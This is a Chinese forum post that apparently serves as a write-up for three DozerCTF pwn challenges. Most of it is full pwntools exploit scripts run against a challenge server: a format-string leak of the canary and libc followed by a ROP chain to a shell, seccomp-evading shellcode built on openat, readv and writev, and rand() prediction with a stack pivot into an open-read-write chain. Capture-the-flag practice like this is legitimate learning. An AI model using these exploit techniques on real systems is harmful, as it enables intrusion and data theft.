DozerCTF-PWN题解

农妇山泉一亩田 · 2024-5-18 15:55:55

这次比赛一共放了4道pwn题，3道栈上的，比较菜，只会做栈
1.pwn_fclose

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
io = remote('139.196.237.232',32985)
# io = process("./pwn")
libc = ELF("./libc.so.6")
payload = b"%35$p%37$p"
io.sendline(payload)
io.recvuntil(b"Hello ")
canary = int(io.recv(18), 16)
libc_base = int(io.recv(14), 16) - 0x21C87
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.symbols["system"]
bin_sh = libc_base + next(libc.search(b"/bin/sh"))
pop_rdi = libc_base + 0x2164f
ret = libc_base + 0x8aa
payload = b"a" * 0xc8 + p64(canary) + b"a" * 8 + p64(ret) + p64(pop_rdi) + p64(bin_sh) + p64(system)
# gdb.attach(io)
io.sendline(payload)
io.interactive()

复制代码

开了canary和PIE，并且末了clode(1),clode(2)。不过问题不大，printf格式化字符串，泄露canary和libc地址，然后直接栈溢出getshell即可，留意栈平衡。后面就是执行exec 1>&0，就能拿flag了
2.mid_pwn

from pwn import *
context(os='linux', arch='amd64', log_level='debug')
elf = ELF("./pwn")
# openat
shellcode_openat=asm(shellcraft.openat(-100,'./flag'))
shellcode = b"\x90" * 544 + shellcode_openat + asm('''
push 3
pop rdi
push 0x1 /* iov size */
pop rdx
push 0x100
lea rbx, [rsp-8]
push rbx
mov rsi, rsp
push SYS_readv
pop rax
syscall
push 1
pop rdi
push 0x1 /* iov size */
pop rdx
push 0x100
lea rbx, [rsp+8]
push rbx
mov rsi, rsp
push SYS_writev
pop rax
syscall
''')
# 运行shellcode
# p = process('./pwn')
p = remote("139.196.237.232", 33035)
# gdb.attach(p)
p.sendline(shellcode)
p.interactive()

复制代码

禁用了open,read,write和其他特别函数，比方sendfile之类，所以用openat,readv和writev读取，read到栈上读，不过它生成一个随机数再mod544，所以用nop滑板填充544字节即可
3.ez_pwn(我最想吐槽的

from pwn import *
from ctypes import *
io = remote("139.196.237.232", 33010)
# io = process("./pwn")
context(log_level='debug', arch='amd64', os='linux')
libc1 = CDLL("./libc.so.6")
libc = ELF("./libc.so.6")
elf = ELF("./pwn")
time = libc1.time(0)
pop_rdi = 0x4014d3
pop_rsi_r15 = 0x4014d1
ret = 0x401467
leave = 0x401341
libc1.srand(time)
v4 = libc1.rand()
io.send(b"1" * 0x20)
payload = str(v4).encode()
print(v4)
bss = elf.bss() + 0x200
io.sendline(payload)
# gdb.attach(io)
payload = (b"a" * 0x30 + p64(bss - 0x8) + p64(pop_rdi) + p64(elf.got["puts"]) + p64(elf.plt["puts"]) + p64(pop_rdi) + p64(bss)
+ p64(pop_rsi_r15) + p64(0x300) + p64(0) + p64(0x4012F2) + p64(leave))
io.sendline(payload)
io.recvuntil(b"~~\n")
puts_addr = u64(io.recv(6).ljust(8, b'\x00'))
# puts_addr=u64(io.recv(14).rjust(8,b'\x00'))
# puts_addr = u64(io.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))
# io.clean()
pause()
print(hex(puts_addr))
libc_base = puts_addr - libc.sym["puts"]
print(f"libc_base: {hex(libc_base)}")
system = libc_base + libc.sym["system"]
binsh=libc_base + next(libc.search(b"/bin/sh"))
pop_rsi_ret = libc_base + 0x2601f
pop_rax_ret = libc_base + 0x36174
pop_rdx_r12_ret = libc_base + 0x119431
one_gadget = libc_base + 0xe3b04
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
payload = p64(pop_rdi)
payload += p64(bss + 0x128)
payload += p64(pop_rsi_ret)
payload += p64(0)
payload += p64(open_addr)
payload += p64(pop_rdi)
payload += p64(3)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(read_addr)
payload += p64(pop_rdi)
payload += p64(1)
payload += p64(pop_rsi_ret)
payload += p64(0x404140)
payload += p64(pop_rdx_r12_ret)
payload += p64(0x100)
payload += p64(0)
payload += p64(write_addr)
payload += p64(0)*16
payload += b"./flag\x00\x00"
io.send(payload)
io.interactive()

复制代码

这道题利用了libc的随机数，然后相等能让你进行一次read的溢出获取libc基地址，然后我试过填read的返回地址，结果因为read函数写的地址是由rbp-0x30所决定的，失败了，然后填start重新布局寄存器，却因为无法再次绕过随机数而无法进入栈溢出，然后发现有一个隐藏函数，里面有read，而且我们可以操控它的寄存器的值，所以就想用栈迁移来getshell，结果又不能执行system函数拿到shell，。。。好吧，只能上orw了。感觉这比前面的题难，为什么是ez，难道是我想复杂了？？
第4道标题写的VM，不太了解

免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！更多信息从访问主页：qidao123.com:ToB企服之家，中国第一个企服评测及商务社交产业平台。

		自动登录	找回密码
密码			立即注册

DozerCTF-PWN题解

0 个回复

快速回复

楼主热帖

标签云